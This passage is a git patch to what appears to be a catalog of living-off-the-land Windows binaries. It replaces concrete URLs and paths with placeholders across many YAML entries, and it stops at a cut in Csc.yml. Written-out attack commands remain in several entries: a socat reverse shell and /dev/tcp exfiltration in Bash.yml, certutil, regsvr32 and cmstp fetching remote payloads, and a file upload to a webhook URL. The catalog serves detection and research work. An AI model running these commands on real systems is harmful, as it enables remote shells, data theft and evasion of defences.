From a79893e7ad7fe69e9eeb37c82e90685e10663312 Mon Sep 17 00:00:00 2001 
From: Wietze Date: Tue, 28 Jan 2025 11:15:01 +0000 Subject: [PATCH] Generalising file paths and urls, see #10 (#422) --- yml/OSBinaries/AppInstaller.yml | 2 +- yml/OSBinaries/At.yml | 2 +- yml/OSBinaries/Atbroker.yml | 2 +- yml/OSBinaries/Bash.yml | 16 +++++----- yml/OSBinaries/Bitsadmin.yml | 2 +- yml/OSBinaries/Certoc.yml | 4 +-- yml/OSBinaries/Certreq.yml | 12 ++++---- yml/OSBinaries/Certutil.yml | 22 +++++++------- yml/OSBinaries/Cmd.yml | 8 ++--- yml/OSBinaries/Cmdkey.yml | 2 +- yml/OSBinaries/Cmdl32.yml | 2 +- yml/OSBinaries/Cmstp.yml | 6 ++-- yml/OSBinaries/Colorcpl.yml | 4 +-- yml/OSBinaries/ConfigSecurityPolicy.yml | 8 ++--- yml/OSBinaries/Conhost.yml | 8 ++--- yml/OSBinaries/Control.yml | 8 ++--- yml/OSBinaries/Csc.yml | 12 ++++---- yml/OSBinaries/Cscript.yml | 4 +-- yml/OSBinaries/CustomShellHost.yml | 2 +- yml/OSBinaries/DataSvcUtil.yml | 4 +-- yml/OSBinaries/Desktopimgdownldr.yml | 4 +-- yml/OSBinaries/DeviceCredentialDeployment.yml | 4 +-- yml/OSBinaries/Dfsvc.yml | 6 ++-- yml/OSBinaries/Diantz.yml | 12 ++++---- yml/OSBinaries/Diskshadow.yml | 8 ++--- yml/OSBinaries/Dnscmd.yml | 5 ++-- yml/OSBinaries/Esentutl.yml | 16 +++++----- yml/OSBinaries/Eventvwr.yml | 4 +-- yml/OSBinaries/Expand.yml | 8 ++--- yml/OSBinaries/Explorer.yml | 6 ++-- yml/OSBinaries/Extexport.yml | 6 ++-- yml/OSBinaries/Extrac32.yml | 14 ++++----- yml/OSBinaries/Findstr.yml | 12 ++++---- yml/OSBinaries/Forfiles.yml | 10 +++---- yml/OSBinaries/Fsutil.yml | 4 +-- yml/OSBinaries/Ftp.yml | 6 ++-- yml/OSBinaries/Gpscript.yml | 4 +-- yml/OSBinaries/Hh.yml | 16 +++++----- yml/OSBinaries/IMEWDBLD.yml | 4 +-- yml/OSBinaries/Ie4uinit.yml | 4 +-- yml/OSBinaries/Iediagcmd.yml | 2 +- yml/OSBinaries/Ieexec.yml | 12 ++++---- yml/OSBinaries/Ilasm.yml | 7 ++--- yml/OSBinaries/Infdefaultinstall.yml | 4 +-- yml/OSBinaries/Installutil.yml | 6 ++-- yml/OSBinaries/Jsc.yml | 12 ++++---- yml/OSBinaries/Ldifde.yml | 6 ++-- yml/OSBinaries/Makecab.yml | 8 ++--- yml/OSBinaries/Mavinject.yml | 6 ++-- 
.../Microsoft.Workflow.Compiler.yml | 12 ++++---- yml/OSBinaries/Mmc.yml | 4 +-- yml/OSBinaries/MpCmdRun.yml | 13 ++++---- yml/OSBinaries/Msbuild.yml | 18 +++++------ yml/OSBinaries/Msconfig.yml | 2 +- yml/OSBinaries/Msdt.yml | 10 +++---- yml/OSBinaries/Msedge.yml | 10 +++---- yml/OSBinaries/Mshta.yml | 10 +++---- yml/OSBinaries/Msiexec.yml | 12 ++++---- yml/OSBinaries/Netsh.yml | 4 +-- yml/OSBinaries/Ngen.yml | 2 +- yml/OSBinaries/Odbcconf.yml | 12 ++++---- yml/OSBinaries/Pcalua.yml | 8 ++--- yml/OSBinaries/Pcwrun.yml | 4 +-- yml/OSBinaries/Pktmon.yml | 5 +--- yml/OSBinaries/Pnputil.yml | 2 +- yml/OSBinaries/Presentationhost.yml | 6 ++-- yml/OSBinaries/Print.yml | 12 ++++---- yml/OSBinaries/PrintBrm.yml | 6 ++-- yml/OSBinaries/Provlaunch.yml | 2 +- yml/OSBinaries/Psr.yml | 4 +-- yml/OSBinaries/Rasautou.yml | 4 +-- yml/OSBinaries/Rdrleakdiag.yml | 8 ++--- yml/OSBinaries/Reg.yml | 8 ++--- yml/OSBinaries/Regasm.yml | 8 ++--- yml/OSBinaries/Regedit.yml | 8 ++--- yml/OSBinaries/Regini.yml | 6 ++-- yml/OSBinaries/Register-cimprovider.yml | 6 ++-- yml/OSBinaries/Regsvcs.yml | 10 +++---- yml/OSBinaries/Regsvr32.yml | 10 +++---- yml/OSBinaries/Replace.yml | 12 ++++---- yml/OSBinaries/Rpcping.yml | 4 +-- yml/OSBinaries/Rundll32.yml | 25 +++++----------- yml/OSBinaries/Runexehelper.yml | 2 +- yml/OSBinaries/Runonce.yml | 6 ++-- yml/OSBinaries/Runscripthelper.yml | 8 ++--- yml/OSBinaries/Sc.yml | 6 ++-- yml/OSBinaries/Schtasks.yml | 11 ++----- yml/OSBinaries/Scriptrunner.yml | 12 ++++---- yml/OSBinaries/SettingSyncHost.yml | 6 ++-- yml/OSBinaries/Ssh.yml | 12 ++++---- yml/OSBinaries/Syncappvpublishingserver.yml | 6 ++-- yml/OSBinaries/Tar.yml | 10 +++---- yml/OSBinaries/Ttdinject.yml | 12 ++++---- yml/OSBinaries/Tttracer.yml | 10 +++---- yml/OSBinaries/Unregmp2.yml | 2 +- yml/OSBinaries/Vbc.yml | 6 ++-- yml/OSBinaries/Verclsid.yml | 4 +-- yml/OSBinaries/Wab.yml | 4 +-- yml/OSBinaries/Wbadmin.yml | 4 +-- yml/OSBinaries/Winget.yml | 6 ++-- yml/OSBinaries/Wlrmdr.yml | 6 ++-- 
yml/OSBinaries/Wmic.yml | 12 ++++---- yml/OSBinaries/WorkFolders.yml | 2 +- yml/OSBinaries/Wscript.yml | 6 ++-- yml/OSBinaries/Wsreset.yml | 4 +-- yml/OSBinaries/Wuauclt.yml | 6 ++-- yml/OSBinaries/Xwizard.yml | 6 ++-- yml/OSBinaries/msedge_proxy.yml | 11 ++----- yml/OSBinaries/msedgewebview2.yml | 16 +++++----- yml/OSBinaries/wt.yml | 4 +-- yml/OSLibraries/Advpack.yml | 10 +++---- yml/OSLibraries/Desk.yml | 4 +-- yml/OSLibraries/Dfshim.yml | 8 ++--- yml/OSLibraries/Ieadvpack.yml | 10 +++---- yml/OSLibraries/Ieframe.yml | 4 +-- yml/OSLibraries/Mshtml.yml | 4 +-- yml/OSLibraries/Pcwutl.yml | 4 +-- yml/OSLibraries/Scrobj.yml | 4 +-- yml/OSLibraries/Setupapi.yml | 4 +-- yml/OSLibraries/Shdocvw.yml | 2 +- yml/OSLibraries/Shell32.yml | 8 ++--- yml/OSLibraries/Shimgvw.yml | 2 +- yml/OSLibraries/Syssetup.yml | 4 +-- yml/OSLibraries/Url.yml | 12 ++++---- yml/OSLibraries/Zipfldr.yml | 2 +- yml/OSLibraries/comsvcs.yml | 3 +- yml/OSScripts/CL_LoadAssembly.yml | 2 -- yml/OSScripts/CL_mutexverifiers.yml | 6 ++-- yml/OSScripts/Cl_invocation.yml | 6 ++-- yml/OSScripts/Launch-VsDevShell.yml | 4 +-- yml/OSScripts/Manage-bde.yml | 6 ++-- yml/OSScripts/Pubprn.yml | 4 +-- yml/OSScripts/Syncappvpublishingserver.yml | 4 +-- yml/OSScripts/UtilityFunctions.yml | 2 -- yml/OSScripts/Winrm.yml | 6 ++-- yml/OSScripts/pester.yml | 14 ++++----- yml/OtherMSBinaries/AccCheckConsole.yml | 6 ++-- yml/OtherMSBinaries/Adplus.yml | 8 ++--- yml/OtherMSBinaries/Agentexecutor.yml | 10 +++---- yml/OtherMSBinaries/Appcert.yml | 4 +-- yml/OtherMSBinaries/Appvlp.yml | 17 +++-------- yml/OtherMSBinaries/Bginfo.yml | 18 +++++------ yml/OtherMSBinaries/Cdb.yml | 10 +++---- yml/OtherMSBinaries/Coregen.yml | 6 ++-- yml/OtherMSBinaries/Createdump.yml | 2 +- yml/OtherMSBinaries/Csi.yml | 6 ++-- yml/OtherMSBinaries/DefaultPack.yml | 6 ++-- yml/OtherMSBinaries/Devinit.yml | 2 +- yml/OtherMSBinaries/Devtoolslauncher.yml | 8 ++--- yml/OtherMSBinaries/Dnx.yml | 10 +++---- yml/OtherMSBinaries/Dotnet.yml | 10 +++---- 
yml/OtherMSBinaries/Dsdbutil.yml | 2 -- yml/OtherMSBinaries/Dtutil.yml | 2 +- yml/OtherMSBinaries/Dump64.yml | 2 +- yml/OtherMSBinaries/DumpMinitool.yml | 2 +- yml/OtherMSBinaries/Dxcap.yml | 6 ++-- yml/OtherMSBinaries/Excel.yml | 4 +-- yml/OtherMSBinaries/Fsi.yml | 2 +- yml/OtherMSBinaries/FsiAnyCpu.yml | 2 +- yml/OtherMSBinaries/Mftrace.yml | 17 ++--------- .../Microsoft.NodejsTools.PressAnyKey.yml | 4 +-- yml/OtherMSBinaries/Msaccess.yml | 2 +- yml/OtherMSBinaries/Msdeploy.yml | 14 ++++----- yml/OtherMSBinaries/MsoHtmEd.yml | 2 +- yml/OtherMSBinaries/Mspub.yml | 2 +- yml/OtherMSBinaries/Msxsl.yml | 14 ++++----- yml/OtherMSBinaries/Ntdsutil.yml | 4 +-- yml/OtherMSBinaries/OpenConsole.yml | 4 +-- yml/OtherMSBinaries/Powerpnt.yml | 2 +- yml/OtherMSBinaries/Procdump.yml | 8 ++--- yml/OtherMSBinaries/ProtocolHandler.yml | 2 +- yml/OtherMSBinaries/Rcsi.yml | 8 ++--- yml/OtherMSBinaries/Remote.yml | 12 ++++---- yml/OtherMSBinaries/Sqldumper.yml | 4 +-- yml/OtherMSBinaries/Sqlps.yml | 4 +-- yml/OtherMSBinaries/Sqltoolsps.yml | 6 ++-- yml/OtherMSBinaries/Squirrel.yml | 10 +++---- yml/OtherMSBinaries/Te.yml | 4 +-- yml/OtherMSBinaries/Teams.yml | 2 +- yml/OtherMSBinaries/Tracker.yml | 8 ++--- yml/OtherMSBinaries/Update.yml | 30 +++++++++---------- yml/OtherMSBinaries/VSDiagnostics.yml | 4 +-- yml/OtherMSBinaries/VSIISExeLauncher.yml | 7 ++--- yml/OtherMSBinaries/Visio.yml | 2 +- yml/OtherMSBinaries/VisualUiaVerifyNative.yml | 2 -- yml/OtherMSBinaries/VsLaunchBrowser.yml | 6 ++-- yml/OtherMSBinaries/Vshadow.yml | 4 +-- yml/OtherMSBinaries/Vsjitdebugger.yml | 8 ++--- yml/OtherMSBinaries/Wfc.yml | 2 +- yml/OtherMSBinaries/Winproj.yml | 2 +- yml/OtherMSBinaries/Winword.yml | 2 +- yml/OtherMSBinaries/Wsl.yml | 6 ++-- yml/OtherMSBinaries/vsls-agent.yml | 2 +- yml/OtherMSBinaries/vstest.console.yml | 2 +- yml/OtherMSBinaries/winfile.yml | 2 +- yml/OtherMSBinaries/xsd.yml | 2 +- 196 files changed, 555 insertions(+), 758 deletions(-) 
diff --git a/yml/OSBinaries/AppInstaller.yml b/yml/OSBinaries/AppInstaller.yml index c965bf8..70fed07 100644 --- a/yml/OSBinaries/AppInstaller.yml +++ b/yml/OSBinaries/AppInstaller.yml @@ -4,7 +4,7 @@ Description: Tool used for installation of AppX/MSIX applications on Windows 10 Author: 'Wade Hickey' Created: 2020-12-02 Commands: - - Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw + - Command: start ms-appinstaller://?source={REMOTEURL:.exe} Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in INetCache. Usecase: Download file from Internet Category: Download diff --git a/yml/OSBinaries/At.yml b/yml/OSBinaries/At.yml index 80c5faa..8794dfc 100644 --- a/yml/OSBinaries/At.yml +++ b/yml/OSBinaries/At.yml @@ -4,7 +4,7 @@ Description: Schedule periodic tasks Author: 'Freddie Barr-Smith' Created: 2019-09-20 Commands: - - Command: C:\Windows\System32\at.exe 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe + - Command: C:\Windows\System32\at.exe 09:00 /interactive /every:m,t,w,th,f,s,su {CMD} Description: Create a recurring task to execute every day at a specific time. Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive Category: Execute diff --git a/yml/OSBinaries/Atbroker.yml b/yml/OSBinaries/Atbroker.yml index d8f5064..e932250 100644 --- a/yml/OSBinaries/Atbroker.yml +++ b/yml/OSBinaries/Atbroker.yml @@ -1,7 +1,7 @@ --- Name: Atbroker.exe Description: Helper binary for Assistive Technology (AT) -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: ATBroker.exe /start malware diff --git a/yml/OSBinaries/Bash.yml b/yml/OSBinaries/Bash.yml index ec33fe0..110442f 100644 --- a/yml/OSBinaries/Bash.yml +++ b/yml/OSBinaries/Bash.yml 
@@ -1,11 +1,11 @@ --- Name: Bash.exe Description: File used by Windows subsystem for Linux -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: bash.exe -c calc.exe - Description: Executes calc.exe from bash.exe + - Command: bash.exe -c "{CMD}" + Description: Executes executable from bash.exe Usecase: Performs execution of specified file, can be used as a defensive evasion. Category: Execute Privileges: User @@ -14,7 +14,7 @@ Commands: Tags: - Execute: CMD - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane" - Description: Executes a reverseshell + Description: Executes a reverse shell Usecase: Performs execution of specified file, can be used as a defensive evasion. Category: Execute Privileges: User @@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows 10 Tags: - Execute: CMD - - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24' + - Command: bash.exe -c 'cat {PATH:.zip} > /dev/tcp/192.168.1.10/24' Description: Exfiltrate data Usecase: Performs execution of specified file, can be used as a defensive evasion. Category: Execute @@ -31,8 +31,8 @@ Commands: OperatingSystem: Windows 10 Tags: - Execute: CMD - - Command: bash.exe -c calc.exe - Description: Executes calc.exe from bash.exe + - Command: bash.exe -c "{CMD}" + Description: Executes executable from bash.exe Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting. Category: AWL Bypass Privileges: User @@ -43,8 +43,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\bash.exe - Path: C:\Windows\SysWOW64\bash.exe -Code_Sample: - - Code: Detection: - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml 
diff --git a/yml/OSBinaries/Bitsadmin.yml b/yml/OSBinaries/Bitsadmin.yml index c41bcf3..68b7f0d 100644 --- a/yml/OSBinaries/Bitsadmin.yml +++ b/yml/OSBinaries/Bitsadmin.yml @@ -1,7 +1,7 @@ --- Name: Bitsadmin.exe Description: Used for managing background intelligent transfer -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1 diff --git a/yml/OSBinaries/Certoc.yml b/yml/OSBinaries/Certoc.yml index 34b5c3f..4d73ac9 100644 --- a/yml/OSBinaries/Certoc.yml +++ b/yml/OSBinaries/Certoc.yml @@ -4,7 +4,7 @@ Description: Used for installing certificates Author: 'Ensar Samil' Created: 2021-10-07 Commands: - - Command: certoc.exe -LoadDLL "C:\test\calc.dll" + - Command: certoc.exe -LoadDLL {PATH_ABSOLUTE:.dll} Description: Loads the target DLL file Usecase: Execute code within DLL file Category: Execute @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows Server 2022 Tags: - Execute: DLL - - Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1 + - Command: certoc.exe -GetCACAPS {REMOTEURL:.ps1} Description: Downloads text formatted files Usecase: Download scripts, webshells etc. Category: Download diff --git a/yml/OSBinaries/Certreq.yml b/yml/OSBinaries/Certreq.yml index cd01a66..6f089ee 100644 --- a/yml/OSBinaries/Certreq.yml +++ b/yml/OSBinaries/Certreq.yml 
@@ -1,18 +1,18 @@ --- Name: CertReq.exe Description: Used for requesting and managing certificates -Author: 'David Middlehurst' +Author: David Middlehurst Created: 2020-07-07 Commands: - - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt - Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory + - Command: CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE} {PATH:.txt} + Description: Send the specified file (penultimate argument) to the specified URL via HTTP POST and save the response to the specified txt file (last argument). Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 - - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini - Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST and show response in terminal + - Command: CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE} + Description: Send the specified file (last argument) to the specified URL via HTTP POST and show response in terminal. Usecase: Upload Category: Upload Privileges: User @@ -21,8 +21,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\certreq.exe - Path: C:\Windows\SysWOW64\certreq.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml - IOC: certreq creates new files diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml index 75445ed..3dc75b1 100644 --- a/yml/OSBinaries/Certutil.yml +++ b/yml/OSBinaries/Certutil.yml 
@@ -1,46 +1,46 @@ --- Name: Certutil.exe Description: Windows binary used for handling certificates -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe - Description: Download and save 7zip to disk in the current folder. + - Command: certutil.exe -urlcache -split -f {REMOTEURL:.exe} {PATH:.exe} + Description: Download and save executable to disk in the current folder. Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe - Description: Download and save 7zip to disk in the current folder. + - Command: certutil.exe -verifyctl -f -split {REMOTEURL:.exe} {PATH:.exe} + Description: Download and save executable to disk in the current folder. Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt + - Command: certutil.exe -urlcache -split -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:ttt Description: Download and save a PS1 file to an Alternate Data Stream (ADS). 
Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: certutil -encode inputFileName encodedOutputFileName + - Command: certutil -encode {PATH} {PATH:.base64} Description: Command to encode a file using Base64 Usecase: Encode files to evade defensive measures Category: Encode Privileges: User MitreID: T1027.013 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: certutil -decode encodedInputFileName decodedOutputFileName + - Command: certutil -decode {PATH:.base64} {PATH} Description: Command to decode a Base64 encoded file. Usecase: Decode files to evade defensive measures Category: Decode Privileges: User MitreID: T1140 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: certutil -decodehex encoded_hexadecimal_InputFileName decodedOutputFileName - Description: Command to decode a hexadecimal-encoded file decodedOutputFileName + - Command: certutil -decodehex {PATH:.hex} {PATH} + Description: Command to decode a hexadecimal-encoded file. Usecase: Decode files to evade defensive measures Category: Decode Privileges: User @@ -49,8 +49,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\certutil.exe - Path: C:\Windows\SysWOW64\certutil.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml diff --git a/yml/OSBinaries/Cmd.yml b/yml/OSBinaries/Cmd.yml index 44ec520..8586dc1 100644 --- a/yml/OSBinaries/Cmd.yml +++ b/yml/OSBinaries/Cmd.yml 
@@ -4,28 +4,28 @@ Description: The command-line interpreter in Windows Author: Ye Yint Min Thu Htut Created: 2019-06-26 Commands: - - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat + - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:{REMOTEURL:.sct} ^scrobj.dll > {PATH}:payload.bat Description: Add content to an Alternate Data Stream (ADS). Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: cmd.exe - < fakefile.doc:payload.bat + - Command: cmd.exe - < {PATH}:payload.bat Description: Execute payload.bat stored in an Alternate Data Stream (ADS). Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism Category: ADS Privileges: User MitreID: T1059.003 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: type \\webdav-server\folder\file.ext > C:\Path\file.ext + - Command: type {PATH_SMB} > {PATH_ABSOLUTE} Description: Downloads a specified file from a WebDAV server to the target file. Usecase: Download/copy a file from a WebDAV server Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: type C:\Path\file.ext > \\webdav-server\folder\file.ext + - Command: type {PATH_ABSOLUTE} > {PATH_SMB} Description: Uploads a specified file to a WebDAV server. Usecase: Upload a file to a WebDAV server Category: Upload diff --git a/yml/OSBinaries/Cmdkey.yml b/yml/OSBinaries/Cmdkey.yml index d8d84e1..e2b3c42 100644 --- a/yml/OSBinaries/Cmdkey.yml +++ b/yml/OSBinaries/Cmdkey.yml 
@@ -1,7 +1,7 @@ --- Name: Cmdkey.exe Description: creates, lists, and deletes stored user names and passwords or credentials. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: cmdkey /list diff --git a/yml/OSBinaries/Cmdl32.yml b/yml/OSBinaries/Cmdl32.yml index bf01894..95505a2 100644 --- a/yml/OSBinaries/Cmdl32.yml +++ b/yml/OSBinaries/Cmdl32.yml @@ -1,7 +1,7 @@ --- Name: cmdl32.exe Description: Microsoft Connection Manager Auto-Download -Author: 'Elliot Killick' +Author: Elliot Killick Created: 2021-08-26 Commands: - Command: cmdl32 /vpn /lan %cd%\config diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml index 5bd76aa..f2876a2 100644 --- a/yml/OSBinaries/Cmstp.yml +++ b/yml/OSBinaries/Cmstp.yml @@ -1,10 +1,10 @@ --- Name: Cmstp.exe Description: Installs or removes a Connection Manager service profile. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf + - Command: cmstp.exe /ni /s {PATH_ABSOLUTE:.inf} Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet. Category: Execute @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: INF - - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf + - Command: cmstp.exe /ni /s {REMOTEURL:.inf} Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Usecase: Execute code hidden within an inf file. Execute code directly from Internet. Category: AWL Bypass 
diff --git a/yml/OSBinaries/Colorcpl.yml b/yml/OSBinaries/Colorcpl.yml index e894bba..d5030d0 100644 --- a/yml/OSBinaries/Colorcpl.yml +++ b/yml/OSBinaries/Colorcpl.yml @@ -1,10 +1,10 @@ --- Name: Colorcpl.exe Description: Binary that handles color management -Author: 'Arjan Onwezen' +Author: Arjan Onwezen Created: 2023-06-26 Commands: - - Command: colorcpl file.txt + - Command: colorcpl {PATH} Description: Copies the referenced file to C:\Windows\System32\spool\drivers\color\. Usecase: Copies file(s) to a subfolder of a generally trusted folder (c:\Windows\System32), which can be used to hide files or make them blend into the environment. Category: Copy diff --git a/yml/OSBinaries/ConfigSecurityPolicy.yml b/yml/OSBinaries/ConfigSecurityPolicy.yml index c8aa121..46d8d47 100644 --- a/yml/OSBinaries/ConfigSecurityPolicy.yml +++ b/yml/OSBinaries/ConfigSecurityPolicy.yml 
@@ -1,17 +1,17 @@ --- Name: ConfigSecurityPolicy.exe -Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads. +Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. You can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads. Author: Ialle Teixeira Created: 2020-09-04 Commands: - - Command: ConfigSecurityPolicy.exe C:\Windows\System32\calc.exe https://webhook.site/xxxxxxxxx?encodedfile + - Command: ConfigSecurityPolicy.exe {PATH_ABSOLUTE} {REMOTEURL} Description: Upload file, credentials or data exfiltration in general Usecase: Upload file Category: Upload Privileges: User MitreID: T1567 OperatingSystem: Windows 10 - - Command: ConfigSecurityPolicy.exe https://example.com/payload + - Command: ConfigSecurityPolicy.exe {REMOTEURL} Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server Category: Download @@ -23,8 +23,6 @@ Commands: Full_Path: - Path: C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml - IOC: ConfigSecurityPolicy storing data into alternate data streams. diff --git a/yml/OSBinaries/Conhost.yml b/yml/OSBinaries/Conhost.yml index cd076da..3ebb4a5 100644 --- a/yml/OSBinaries/Conhost.yml +++ b/yml/OSBinaries/Conhost.yml 
@@ -4,8 +4,8 @@ Description: Console Window host Author: Wietze Beukema Created: 2022-04-05 Commands: - - Command: "conhost.exe calc.exe" - Description: Execute calc.exe with conhost.exe as parent process + - Command: conhost.exe {CMD} + Description: Execute a command line with conhost.exe as parent process Usecase: Use conhost.exe as a proxy binary to evade defensive counter-measures Category: Execute Privileges: User @@ -13,8 +13,8 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD - - Command: "conhost.exe --headless calc.exe" - Description: Execute calc.exe with conhost.exe as parent process + - Command: conhost.exe --headless {CMD} + Description: Execute a command line with conhost.exe as parent process Usecase: Specify --headless parameter to hide child process window (if applicable) Category: Execute Privileges: User diff --git a/yml/OSBinaries/Control.yml b/yml/OSBinaries/Control.yml index a486458..349196e 100644 --- a/yml/OSBinaries/Control.yml +++ b/yml/OSBinaries/Control.yml @@ -1,10 +1,10 @@ --- Name: Control.exe Description: Binary used to launch controlpanel items in Windows -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: control.exe c:\windows\tasks\file.txt:evil.dll + - Command: control.exe {PATH_ABSOLUTE}:evil.dll Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS). Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism Category: ADS 
@@ -13,8 +13,8 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Command: control.exe c:\windows\tasks\evil.cpl - Description: Execute evil.cpl payload. A CPL is a DLL file with CPlApplet export function) + - Command: control.exe {PATH_ABSOLUTE:.cpl} + Description: Execute .cpl file. A CPL is a DLL file with CPlApplet export function) Usecase: Use to execute code and bypass application whitelisting Category: Execute Privileges: User diff --git a/yml/OSBinaries/Csc.yml b/yml/OSBinaries/Csc.yml index c263683..14ad6de 100644 --- a/yml/OSBinaries/Csc.yml +++ b/yml/OSBinaries/Csc.yml @@ -1,18 +1,18 @@ --- Name: Csc.exe Description: Binary file used by .NET Framework to compile C# code -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: csc.exe -out:Output.exe File.cs - Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in File.cs and output the compiled version to Output.exe. + - Command: csc.exe -out:{PATH:.exe} {PATH:.cs} + Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in the specified .cs file and output the compiled version to the specified .exe path. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, 